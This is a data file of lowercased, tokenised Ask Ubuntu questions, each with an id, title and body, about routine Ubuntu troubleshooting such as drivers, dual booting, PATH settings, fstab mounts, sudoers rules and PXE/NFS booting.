359047	ubuntu 12.04 lts corrupting 7th gen ipod nano ?	i connected my ipod to my pc with ubuntu 12.04 lts to transfer some music . after it was all transfered i safely ejected it , and checked my ipod . to my surprise , all of my songs are 0.00 seconds long ; it is not even showing the songs i just transferred . my ipod says it still has lots of space taken up on it . can someone tell me why this has happened , and how ( if possible ) to get it all back ? thank you !
359050	initial : ubuntu 13.10 installation on a mac stationay machine	system installation from iso and dmg ( mac ) - files . is it possible to install mac os 10.8.3 alongside ubuntu 13.10 when ubuntu is initially installed on the machine ? the main question is therefore : how do i change disk partition for the mac os installation on the ubuntu 13.10 system ? or do i have to install mac os 10.8.3 first and then install ubuntu 13.10 ?
359054	interrupted installation of ubuntu leads to endless restarting	i was installing ubuntu 12.04 ( ? ) lts and i did n't notice that my battery was running out because i fell asleep while waiting for the installation . when i tried to restart the pc after recharging , i tried to reinstall it . when the cd is attached my pc restarted after sometime . when i remove the cd it leads to the grub rescue . by the way i 'm new in using ubuntu so i 'm not very familiar with it .
359056	windows 7 with ubuntu on dell studio 15	dell studio 15 . c : 40gb primary ( win7 ) , 130gb on d : and e : how to go dual boot with ubuntu and what about drivers ? if my dell driver cd will work ? ? ?
359060	why does alien need sudo privilege ?	i wonder why does alien need sudo privileges while converting a .rpm file to .deb in a non-privileged directory ( eg . my home directory ) . is this a security feature ( which i believe is redundant , since installing the package would need dpkg , which needs sudo privileges ) ?
359061	using any nvidia-* package causes system to hang on boot	i 'm using a geforce gtx 660 on a custom built system . the nouveau driver works properly and i can use ubuntu normally with it . however i 'd like to use nvidia 's driver . i have not really found an official guide for this so i 'm sort of winging it . i 've seen suggestions to install packages from ubuntu software center , but nothing appears in the `` additional drivers '' tab , so i 'm doing this all from apt . i 've attempted to install nvidia-304 , nvidia-319 ( the one i expect would work ) , and nvidia-331 ( from xorg-edgers just for the hell of it ) . they all have the same result : after making my selection in grub , it behaves as though it 's about to boot but hangs at a solid dark purple screen . if i remove 'quiet ' from the boot parameters , it hangs at two brief messages citing which kernel it 's loading . if i set vga=vesa : off i see the usual boot messages , though it hangs all the same with nothing of note in the logs . my current kernel is 3.8.0-31-generic . any ideas ?
359063	linksys wireless n 300 not recognized	hi after reading a couple of posts on this , i still ca n't get this card recognized . can somebody step me thru to get this working ? maybe i am missing something . i am kinda novice . thanks
359064	cant create a file and write to it from a .sh script	i am trying to create a file and write to it using a .sh script but is not working ( nothing is being created , and i do n't see any error ) . this is how that part of my script looks like : facesconfigcontent= '' < ? xml version='1.0 ' encoding='utf-8 ' ? > < faces-config version=\ '' 2.2\ '' xmlns=\ '' http : //xmlns.jcp.org/xml/ns/javaee\ '' xmlns : xsi=\ '' http : //www.w3.org/2001/xmlschema-instance\ '' xsi : schemalocation=\ '' http : //xmlns.jcp.org/xml/ns/javaee http : //xmlns.jcp.org/xml/ns/javaee/web-facesconfig_2_2.xsd\ '' > < /faces-config > '' facesconfigfilename= '' faces-config.xml '' cd ~/desktop/ $ { artifactid } /src/main/webapp/web-inf echo $ { facesconfigcontent } > $ { facesconfigfilename } do you see something wrong ?
359066	ubuntu pycharm config folder	i have downloaded the latest pycharm ide but i need to change the color scheme on their official site it says to go to linux ~/.pycharmxx/config that contains user-specific settings . ~/.pycharmxx/system that stores pycharm data caches . but i ca n't locate any of the folders . note : i downloaded the pycharms archive and extracted it in downloads .
359067	adding custom path by updating ~/.profile with not working	i have altered my ~/.profile file by adding the following : path= '' /user/share/android-sdk-linux/tools : $ path '' i then log off and log in again , but the path is not added to the $ path environment variable . i am checking in terminal : echo $ path /usr/share/android-sdk-linux/tools : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/lib/jvm/jdk1.7.0_17/bin please advise edit i have even tried : path= $ path : /usr/share/android-sdk-linux/tools export path no luck here either . edit 2 ~/.profile : # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi # set path to android # path = $ path : /usr/share/android-sdk-linux/tools # export path path= '' /usr/share/android-sdk-linux/tools : $ path '' adding to ~/.bachrc or /etc/environment : path= '' /usr/share/android-sdk-linux/tools : $ path '' works , but why not ~/.profile ?
359068	mount network drive - line 3 in /etc/fstab is bad	i am a ubuntu 12.04 novice and am seriously struggling to mount my network drive . i can see it in nautilus , and its properties detail its name as 'seagate expansi ' . i have installed cifs , created the folder /media/public and added the line : //192.168.1.1/seagate expansi /media/public cifs guest 0 0 ... to etc/fstab . however when i run : sudo mount -a i receive the error : line 3 in /etc/fstab is bad i kind of understand what the error is telling me , but i do n't understand where i have gone wrong . does anyone have any advice ?
359069	eclipse fails to run	i 've installed scala ide plugin and tweaked eclipse.ini file according to their suggestions here . for some reason eclipse gets upset about that and errors on launch . it seems to work if i comment out single line : -vmargs i do n't understand , what 's the problem here ? this is my eclipse.ini file : -startup plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20130807-1835 -product org.eclipse.epp.package.jee.product -- launcher.defaultaction openfile -showsplash org.eclipse.platform -- launcher.xxmaxpermsize 256m -vmargs -xms256m -xmx2048m -xx : permsize=64m -xss1m -server -xx : +doescapeanalysis -xx : +useconcmarksweepgc -xx : +usecompressedoops -- launcher.defaultaction openfile -- launcher.appendvmargs -vmargs -dosgi.requiredjavaversion=1.6 -xx : maxpermsize=256m -xms40m -xmx512m this is the message i get when eclipse fails to launch : update : eclipse version : 4.3 ( kepler ) 64bit , ubuntu version : 13.10 ( saucy salamander ) 64bit , java version : oracle 1.7_40 64bit update2 : including my configuration/config.ini : # this configuration file was written by : org.eclipse.equinox.internal.frameworkadmin.equinox.equinoxfwconfigfileparser # mon oct 14 19:30:48 bst 2013 org.eclipse.update.reconcile=false eclipse.p2.profile=epp.package.jee osgi.instance.area.default= @ user.home/workspace osgi.framework=file\ : plugins/org.eclipse.osgi_3.9.1.v20130814-1242.jar equinox.use.ds=true eclipse.buildid=4.3.0.m20130911-1000 osgi.bundles=reference\ : file\ : org.eclipse.equinox.simpleconfigurator_1.0.400.v20130327-2119.jar @ 1\ : start org.eclipse.swt.internal.gtk.usecairo=true org.eclipse.equinox.simpleconfigurator.configurl=file\ : org.eclipse.equinox.simpleconfigurator/bundles.info eclipse.product=org.eclipse.platform.ide osgi.splashpath=platform\ : /base/plugins/org.eclipse.platform osgi.framework.extensions=reference\ : file\ : org.eclipse.equinox.weaving.hook_1.0.200.v20120524-1707.jar osgi.bundles.defaultstartlevel=4 eclipse.application=org.eclipse.ui.ide.workbench eclipse.p2.data.area= @ config.dir/../p2/ update3 : i run eclipse from it 's folder in command line like this : gksudo ./eclipse & . i have to run it as a root because otherwise there is a bug that disables main menu dropdowns . which eclipse gives me nothing , probably because i just downloaded/unpacked it directly from eclipse.org and there is no command associated with it .
359070	how do i know what packages i need to install ?	not for any specific program , just in general if i wanted to install something via apt how do i know what packages i need to `` apt-get install '' for that program
359073	samsung galaxy siii mini drivers for linux	i want to install samsung galaxy siii mini gt-i8190 driver on ubuntu so that is detected , in particular by odin software . only available drivers are for windows or mac . wine software obviously can not install the windows version of the driver . please advice how or , if another driver perhaps can be used for this mobile on unix . thank you
359077	problem updating to ubuntu 12.04.3	followed instructions , all nvidia drivers gone . when i enter : sudo apt-get install nvidia-current nvidia settings i get : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nvidia e : unable to locate package settings
359082	resize windows partition without affecting ubuntu in dual-boot	i have installed both windows and ubuntu on a single hard-drive . the windows os is split into 2 partitions , c and d and i want to enlarge the c partition by taking 3gb from the d partition . can i do this using the disk management from windows and without affecting the ubuntu os ?
359083	packages have unmet dependencies on ubuntu sdk installation	the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator but it is not going to be installed depends : qtcreator-plugin-ubuntu but it is not going to be installed depends : qtcreator-plugin-ubuntu-cordova but it is not going to be installed recommends : qtdeclarative5-qtaudioengine-plugin but it is not going to be installed e : unable to correct problems , you have held broken packages . i am using ubuntu 13.04 x64
359084	how do i get my number keys working on this acer aspire 5733 ?	my acer aspire 5733 has a full sized keyboard that i have now become used to , and would like to use the number keys as well . they appear not to be working . i 'm using ubuntu 12.04 . i only installed ubuntu yesterday and other than that its been pretty smooth otherwise .
359087	viewing ups status using apcupsd in net mode ?	i have a headless server running apcupsd attached to an apc ups . i also have several workstations running apcupsd in `` net '' mode to communicate with it . is there a way i can configure the power control panel in system settings on a desktop machine to display the remote server 's battery status ?
359090	how would i install a random program from a random website ?	so i will just give an example and hopefully your response can clear it up for me . i need some random piece of software . for lack of creativity , i will call this program `` ubsoft '' . i 'm downloading this program from some random site called `` ubsoft.com '' . now please put me into your shoes . if you just downloaded this file , how would you install it if you ca n't do it via apt-get because the proper repository does n't exist ?
359093	many ads pages are opening on firefox while navigating	i have ubuntu 13.04 and firefox 24 . lately i 'm having this issue on firefox , some ads pages like `` thelotter '' are opening in new tab while visiting some sites . i have many addons that blocks ads , pop-ups and other stuff , like `` noscript '' , ghostery , adblock etc ... but still the open , so i thought that it could be due to some malware i got on the web . the question is : is it possible that i have some malware or anything like that on my ubuntu ? how can i check it ? and how can i solve the problem ? i also tried to remove firefox and its folder in /home and reinstalled it but same thing . what can i do ? thanks
359094	how to optimize network manager for unencrypted wifi connections	i am developing a tool-chain which performs automatically a network-benchmark and some security checks . as they have a very good reception , i am using two usb wifi antennas . in order to scan for and connect to open networks i have decided to use ubuntu network managers command line interface ( nmcli ) . scan for networks , sort ssids by signal strength and awk for unencrypted ones : nmcli -t -f ssid , mode , signal , security , bssid dev wifi list iface $ interface \ | sort -n -r -t : -k 3 \ | awk -f : ' { if ( $ 2 == `` infrastructure '' & & $ 4 == `` '' ) print substr ( $ 1 , 2 , length ( $ 1 ) - 2 ) ; } ' ) connect to network , specifying the ssid and access point : nmcli device wifi connect `` $ ssid '' iface `` $ iface '' bssid `` $ apmac '' -- timeout 20 however , my timeout of 20 seconds is caught quite frequently . checking /var/log/syslog , tells me , that although i am connecting to an unencrypted network , wpa_supplicant is called , which as far as i know should just be used in case of encrypted networks . moreover , the ssid_scan parameter is set to 1 , which means that a scan with ssid-specific probe request frames is done as an aid to find more aps . however , i specify an ap , so this test should be redundant . last but not least , the `` association request to the driver failed '' message worries me a little bit , but the wifi connection works just fine afterwards . 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) starting connection 'askubuntu' 21:48:12 networkmanager [ 1108 ] : < info > ( wlan1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) scheduled ... 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) started ... 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) scheduled ... 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) complete . 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) starting ... 21:48:12 networkmanager [ 1108 ] : < info > ( wlan1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1/wireless ) : connection 'askubuntu ' requires no security . no secrets needed . 21:48:12 networkmanager [ 1108 ] : < info > config : added 'ssid ' value 'askubuntu' 21:48:12 networkmanager [ 1108 ] : < info > config : added 'scan_ssid ' value '1' 21:48:12 networkmanager [ 1108 ] : < info > config : added 'bssid ' value '02:1a:11 : ff:96:49' 21:48:12 networkmanager [ 1108 ] : < info > config : added 'key_mgmt ' value 'none' 21:48:12 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) complete . 21:48:12 networkmanager [ 1108 ] : < info > config : set interface ap_scan to 1 21:48:12 networkmanager [ 1108 ] : < info > ( wlan1 ) : supplicant interface state : inactive - > scanning 21:48:22 wpa_supplicant [ 1299 ] : wlan1 : trying to associate with 02:1a:11 : ff:96:49 ( ssid='askubuntu ' freq=2437 mhz ) 21:48:22 wpa_supplicant [ 1299 ] : wlan1 : association request to the driver failed 21:48:22 networkmanager [ 1108 ] : < info > ( wlan1 ) : supplicant interface state : scanning - > associating 21:48:22 kernel : [ 9205.713773 ] ipv6 : addrconf ( netdev_change ) : wlan1 : link becomes ready 21:48:22 wpa_supplicant [ 1299 ] : wlan1 : associated with 02:1a:11 : ff:96:49 21:48:22 wpa_supplicant [ 1299 ] : wlan1 : ctrl-event-connected - connection to 02:1a:11 : ff:96:49 completed ( auth ) [ id=0 id_str= ] 21:48:22 networkmanager [ 1108 ] : < info > ( wlan1 ) : supplicant interface state : associating - > completed 21:48:22 networkmanager [ 1108 ] : < info > activation ( wlan1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'askubuntu ' . 21:48:22 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 3 of 5 ( ip configure start ) scheduled . 21:48:22 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 3 of 5 ( ip configure start ) started ... 21:48:22 networkmanager [ 1108 ] : < info > ( wlan1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] 21:48:22 networkmanager [ 1108 ] : < info > activation ( wlan1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) 21:48:22 networkmanager [ 1108 ] : < info > dhclient started with pid 4794 21:48:22 networkmanager [ 1108 ] : < info > activation ( wlan1 ) beginning ip6 addrconf . 21:48:22 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 3 of 5 ( ip configure start ) complete . 21:48:22 dhclient : internet systems consortium dhcp client 4.2.4 21:48:22 dhclient : copyright 2004-2012 internet systems consortium . 21:48:22 dhclient : all rights reserved . 21:48:22 dhclient : for info , please visit https : //www.isc.org/software/dhcp/ 21:48:22 dhclient : 21:48:22 networkmanager [ 1108 ] : < info > ( wlan1 ) : dhcpv4 state changed nbi - > preinit 21:48:22 dhclient : listening on lpf/wlan1/00:13:33 : ab : ff : d2 21:48:22 dhclient : sending on lpf/wlan1/00:13:33 : ab : ff : d2 21:48:22 dhclient : sending on socket/fallback 21:48:22 dhclient : dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 3 ( xid=0x3f3faafb ) 21:48:24 avahi-daemon [ 1083 ] : joining mdns multicast group on interface wlan1.ipv6 with address fe80 : :213:33ff : feab : ffd2 . 21:48:24 avahi-daemon [ 1083 ] : new relevant interface wlan1.ipv6 for mdns . 21:48:24 avahi-daemon [ 1083 ] : registering new address record for fe80 : :213:33ff : feab : ffd2 on wlan1.* . 21:48:25 dhclient : dhcpdiscover on wlan1 to 255.255.255.255 port 67 interval 6 ( xid=0x3f3faafb ) 21:48:25 dhclient : dhcprequest of 192.168.43.72 on wlan1 to 255.255.255.255 port 67 ( xid=0x3f3faafb ) 21:48:25 dhclient : dhcpoffer of 192.168.43.72 from 192.168.43.1 21:48:25 dhclient : dhcpack of 192.168.43.72 from 192.168.43.1 21:48:25 dhclient : bound to 192.168.43.72 -- renewal in 1372 seconds . 21:48:25 networkmanager [ 1108 ] : < info > ( wlan1 ) : dhcpv4 state changed preinit - > bound 21:48:25 networkmanager [ 1108 ] : < info > address 192.168.43.72 21:48:25 networkmanager [ 1108 ] : < info > prefix 24 ( 255.255.255.0 ) 21:48:25 networkmanager [ 1108 ] : < info > gateway 192.168.43.1 21:48:25 networkmanager [ 1108 ] : < info > hostname 'kearney' 21:48:25 networkmanager [ 1108 ] : < info > nameserver '192.168.43.1' 21:48:25 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... 21:48:25 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 5 of 5 ( ipv4 commit ) started ... 21:48:25 avahi-daemon [ 1083 ] : joining mdns multicast group on interface wlan1.ipv4 with address 192.168.43.72 . 21:48:25 avahi-daemon [ 1083 ] : new relevant interface wlan1.ipv4 for mdns . 21:48:25 avahi-daemon [ 1083 ] : registering new address record for 192.168.43.72 on wlan1.ipv4 . 21:48:26 networkmanager [ 1108 ] : < info > ( wlan1 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] 21:48:26 networkmanager [ 1108 ] : < info > activation ( wlan1 ) stage 5 of 5 ( ipv4 commit ) complete . 21:48:26 networkmanager [ 1108 ] : < info > ( wlan1 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] 21:48:26 networkmanager [ 1108 ] : < info > writing dns information to /sbin/resolvconf 21:48:26 dnsmasq [ 1682 ] : setting upstream servers from dbus 21:48:26 dnsmasq [ 1682 ] : using nameserver 192.168.43.1 # 53 21:48:26 dnsmasq [ 1682 ] : using nameserver 192.168.178.1 # 53 21:48:26 networkmanager [ 1108 ] : < info > activation ( wlan1 ) successful , device activated . 15 seconds for a connection to an access point which is next to me seems like a huge overhead . how do i optimize my network manager configuration , so that connections to unencrypted wifi networks are set up as fast as possible ?
359095	installing motherboard drivers	yesterday i 've successfully installed ubuntu 12.04 ( x64 ) , but something 's bothering me , what about the drivers of my motherboard ? i have the support dvd with the drivers of my motherboard , but i do n't know where to start . my motherboard is rampage 3 extreme . thank you for the responses ...
359106	kde4 wallper cycles randomly	i have a dual monitor setup at work and i have a selection of dual monitor images . kde cycles the wallpapers randomly , so despite the fact that the left folder matches the right folder , they get out of cycle . is there any way to make the cycling not random ? either by editing some .kde config file , or by recompiling libraries ?
359107	installation help with ubuntu 64bit and 32bit	i am new to ubuntu because i was tired of normal windows 7 . at first it gave me a problem when i started the installation . it said that it will restart and run in low graphics . it took forever to restart then it took me to the loading screen and freezes is there any fix for this ? thanks ps : currently i am downloading the 32bit version to try it out . in the problem above i was trying the 64bit version .
359116	how can i prevent a user from navigating out of their home folder with sftp ?	i want to set up an account purely for someone/thing to access via sftp . i have already setup the home directory as /media/harddrive/ftp is there any way to prevent this user ( bob ) from accessing /media/harddrive ? probably a really simple thing to do but i want to lock them out of /media/harddrive . i 'm still getting to grips with the whole linux operating system so a step-by-step instruction guide on how to do this would be really helpful as i 'm not totally sure what i need to do .
359117	my greentel dongle is not detected in ubuntu 12.04 lst	i have a gt-g20 greentel dongle and it is not recognized in both usb 2.0 and 3 ports , please give me a solution . below shown the output when executed `` lsusb '' command ; bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 007 : id 20a6 : f00e bus 001 device 003 : id 5986:0295 acer , inc bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader the device is not even listed .
359118	updated stuff with updatemanager problem	i thought i needed to update stuff because of my computer randomly logging me out , so i saw that there was 1,418 updates so i installed them then after that i restarted the computer and i logged in and all that i saw was only my background picture of my desktop ... nothing else just the picture .
359122	could not acquire name on session bus - > failed to load session ubuntu	i am running my system on a lenovo x1 since 12.10 and upgraded to 13.04 ( months ago ) . since today for now special reason ( apart from the weekly system update from ubuntu ) i ca n't login to unity desktop anymore . i get a blank screen with two overlaping error messages : 1 . ) could not acquire name on session bus 2 . ) fail to load session ubuntu ( with a button `` logout '' ) i can still login to `` gnome fallback '' . what i already did was asking google . i found some stuff about my error 2 and i did the reinstall stuff mentioned in here : failed to load session `` ubuntu '' for error 1 . ) i found some solutions which didnot fit to my case because i do n't use vnc server ( i have a vnc client though ) . can someone please help me to fix this ? thank you very much . michael
359126	trying to install postgres 9.3 in a non-lts version of ubuntu , how do i go ?	i 'm trying to install postgres 9.3 with the instructions here . but the install is failing . [ ubuntu : ~ ] $ lsb_release -c codename : raring [ ubuntu : ~ ] $ [ ubuntu : ~ ] $ cat /etc/apt/sources.list.d/pgdg.list deb http : //apt.postgresql.org/pub/repos/apt/ raring-pgdg main [ ubuntu : ~ ] $ [ ubuntu : ~ ] $ sudo apt-get update hit http : //us-west-2.ec2.archive.ubuntu.com raring release.gpg hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates release.gpg hit http : //us-west-2.ec2.archive.ubuntu.com raring release hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates release hit http : //us-west-2.ec2.archive.ubuntu.com raring/main sources hit http : //us-west-2.ec2.archive.ubuntu.com raring/universe sources hit http : //us-west-2.ec2.archive.ubuntu.com raring/main amd64 packages hit http : //us-west-2.ec2.archive.ubuntu.com raring/universe amd64 packages hit http : //us-west-2.ec2.archive.ubuntu.com raring/main translation-en hit http : //us-west-2.ec2.archive.ubuntu.com raring/universe translation-en hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates/main sources hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates/universe sources hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates/main amd64 packages hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates/universe amd64 packages hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates/main translation-en hit http : //us-west-2.ec2.archive.ubuntu.com raring-updates/universe translation-en ign http : //us-west-2.ec2.archive.ubuntu.com raring/main translation-en_us hit http : //security.ubuntu.com raring-security release.gpg ign http : //us-west-2.ec2.archive.ubuntu.com raring/universe translation-en_us ign http : //us-west-2.ec2.archive.ubuntu.com raring-updates/main translation-en_us ign http : //us-west-2.ec2.archive.ubuntu.com raring-updates/universe translation-en_us ign http : //apt.postgresql.org raring-pgdg release.gpg hit http : //security.ubuntu.com raring-security release ign http : //apt.postgresql.org raring-pgdg release hit http : //security.ubuntu.com raring-security/main sources hit http : //security.ubuntu.com raring-security/universe sources hit http : //security.ubuntu.com raring-security/main amd64 packages hit http : //security.ubuntu.com raring-security/universe amd64 packages hit http : //security.ubuntu.com raring-security/main translation-en hit http : //security.ubuntu.com raring-security/universe translation-en ign http : //security.ubuntu.com raring-security/main translation-en_us ign http : //security.ubuntu.com raring-security/universe translation-en_us err http : //apt.postgresql.org raring-pgdg/main amd64 packages 404 not found [ ip : 217.196.149.55 80 ] ign http : //apt.postgresql.org raring-pgdg/main translation-en_us ign http : //apt.postgresql.org raring-pgdg/main translation-en w : failed to fetch http : //apt.postgresql.org/pub/repos/apt/dists/raring-pgdg/main/binary-amd64/packages 404 not found [ ip : 217.196.149.55 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . [ ubuntu : ~ ] $ [ ubuntu : ~ ] $ sudo apt-get install postgresql-9.3 pgadmin3 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package postgresql-9.3 e : could n't find any package by regex 'postgresql-9.3' [ ubuntu : ~ ] $ i 've also tried putting these lines in /etc/apt/sources.list . but that does n't work either . deb mirror : //mirrors.ubuntu.com/mirrors.txt precise main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise-updates main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise-backports main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise-security main restricted universe multiverse
359127	visudo not working for specified files	i am trying to give sudo ability without the need of passwords to specific files . so far i have : employee all= ( all : all ) nopasswd : /home/file_name the file has a simple chmod command , in the bash script it has at the very bottom `` sudo chmod ... '' and it will prompt me for the password . i have tried it as : employee all= ( all : all ) nopasswd : all this will cause it to work , but i only want it to not ask for the password for this single file . eventually i want to also configure it to use root 's password for sudo ( i know it 's not the most secure thing to do , and is not recommended ) . i know at that point you will need to enter in defaults rootpw . does anyone know why this is n't working ? i 'm sure it 's something silly .
359129	asus usb-n66 wireless adapter	edit : i just realized i am an idiot . i installed it . however , now it locks up linux every time i connect to the internet . any ideas ?
359133	no internet connection on compaq 6735s laptop	i am new to ubuntu ( 12.04.3 ) . i installed the software to my laptop http : //www.lapwik.com/hp-compaq_6735s for typical use ( browsing , movies , music , etc . ) i am not a programmer and i ca n't understand what is happening with programs and drivers . i am not able to download the drivers because i do n't have access to the internet because of my network card , i think i found a driver for my network pci , but i do n't know how to use it ( http : //www.broadcom.com/support/802.11/linux_sta.php ) any help ?
359135	make chrome use firefoxe 's flash	google chrome is giving me a lot of problems with flash . flash works fine in firefox . can i make chrome use the flash player from firefox ?
359136	ubuntu 12.04 lts no sound	i just reinstalled ubuntu 12.04 from a dvd that came in the ubuntu user magazine . i previously had 13.04 but had decided to revert back to the lts . now with 12.04 i have no sound when i try to play my music , i tried using musique and also rhythm box they both show playing with the slider but no sound is heard except if the volume is all the way up you can hear a faint hiss or static . any advice on how to fix this ? thanks harlie
359139	what temperature is considered bad for my processor ?	i am using the unity temperature sensor and i have an intelâž coreâ˘2 cpu 4400 . if you need more info i would be happy to include more details about my pc that could help . thanks
359140	german umlauts on us keyboard and second layout	i want to use the following keyboard layout setup : us layout , modified to support german umlauts and bg-bulgarian phonetic layout . so , the normal setup standard us , bg works fine . also , i installed the german umlauts using this giude . they also work fine if i have only 1 layout at all , but when i combine the modified us+german_umlauts layout and the standard bg layout , then the modification modifies the bg layout , which is not ok. has anyone a configuration like this and having the same problem ?
359141	thin client lubuntu over pxe server with dhcp and tftp	i have 10 old computers ( like thin clients ) without hdd . so i decided to use lubuntu as operating system . in my work we have a pxe server with dhcp and tftp , they built a debian distro before and for the menu.cfg , they used boot=live but in lubuntu they use nfs and boot must be boot=casper , so here my problem begins , i tried to change the vmlinuz and initrd , but then i am getting a kernel panic error . is there a script that i can merge squashfs and initrd.gz , so the thin clients will begin directly over initrd.gz . or is there any other solution ?
359144	mac os x-like built-in dictionary in ubuntu	mac os x has had for ages a feature that 's been keeping me from trying or moving to other platforms : its built in dictionary.app with american & british dictionaries as well as thesauri , plus dictionaries of various other languages . the fact that it 's possible to triple-tap ( or double-tap + `` look up `` ) on a phrase of text/word in virtually all applications to have a dictionary pane pop-up , or search for a word in spotlight and press enter for a full explanation of that word , is a major advantage . now , all this os x praise aside : is it possible to achieve something equivalent/comparable in ubuntu or any of its flavors ?
359150	what nfs export settings do i need to boot the ubuntu live discs over a network ?	end goal : have the ability to pxe boot the ubuntu live discs over the network similar to what is seen in this guide what has been achieved : pxe server is up and running with gpxelinux.0 . perfectly functional , as i am able to boot other discs over the network using methods such as memdisk . pfsense server handles tftp traffic another server running ubuntu handles nfs-kernel-server as well as apache for hosting files appended to /etc/exports : /srv/data * ( ro , sync , all_squash , insecure ) the boot label in my pxe menu : label ubuntu 12.04.3 desktop amd64 menu label ubuntu 12.04.3 desktop amd64 kernel http : //192.168.1.5/pxe/data/isos/linux/ubuntu/ubuntu-12.04.3-desktop-amd64/vmlinuz.efi append boot=casper netboot=nfs nfsroot=192.168.1.5 : /srv/data/isos/linux/ubuntu/ubuntu-12.04.3-desktop-amd64 initrd=http : //192.168.1.5/pxe/data/isos/linux/ubuntu/ubuntu-12.04.3-desktop-amd64/initrd.lz what occurs : the client boots up perfectly fine , loads the kernel and initial ramdisk , but when it gets to doing the nfs mount , all it does it this : http : //i.imgur.com/nugfotm.png what i want to happen : quite simply , i 'd want to have the system be able to mount the nfs share and continue booting up what i 've done to troubleshoot : using every possible nfs export table i could think of under the sun to get this thing booted . used a program called jftp to test the connection to the nfs server . worked perfectly .
359155	display wo n't turn on after trying to use ubuntu live cd	i have a dual boot desktop running windows xp and windows 7 64-bit ( each os on separate hard drives ) . my graphics card is a evga nvidia geforce gt 630 ( dvi and hdmi ) . i popped in an ubuntu 11.10 64-bit install disc to try it out without installation . the screen displayed a list of things but then got stuck at a certain point with a cursor flashing at the bottom . i restarted the computer and now my display wo n't turn on . i ca n't access anything now in windows ( windows dual boot option screen , boot menu , etc . ) or ubuntu since my screen wo n't turn on . i do n't have a vga connection on the card or on the motherboard . any possible fix for this or did i just make a huge mistake by trying to use ubuntu ?
359156	how do you run a 32-bit program on a 64-bit version of ubuntu ?	i have a 64-bit version of ubuntu 13.10 . i want to run a 32-bit version of a program . however i see ia32-libs is not included in 13.10 . is there a replacement package for this or what ?
359159	default ide for c programming ?	i am very much new to the ubuntu os . i write c programs for school and i usually do it on a mac and use their default ide xcode . i am just wondering if there is an ide that comes with ubunut 13.04 ? thanks for reading .
359162	no internet connection during install - manually run updates ( 12.04 )	i did n't have access to an internet connection until a few days after my initial ubuntu install . how do i manually run any updates/scripts that would have run during the normal internet-connected install ? thanks !
359163	installing ubuntu touch on a samsung galaxy tab 2 ( p3113 )	i have a galaxy tab ( p3113 ) . i have been trying for some time now to get the developer preview of ubuntu touch installed on it . i followed the instructions on the 3rd-party maintainer 's page for my tablet model on the touch install page . i got to the point where i supposedly boot it up and it works , but it just stays at a blank ( backlit ) screen , until i restart it . i have tried older builds of touch from the time that the image was last updated ( 4/4 ) , but it just does the same thing . are there known issues with this device-specific file ? or is there an official installer now ? i do n't really understand why it still does n't work even after using the build from the last known working time ; is there anything in the instructions that i could have done wrong ? sorry that i have n't provided much detailed info , if there is specific information that i need to provide i can find it .
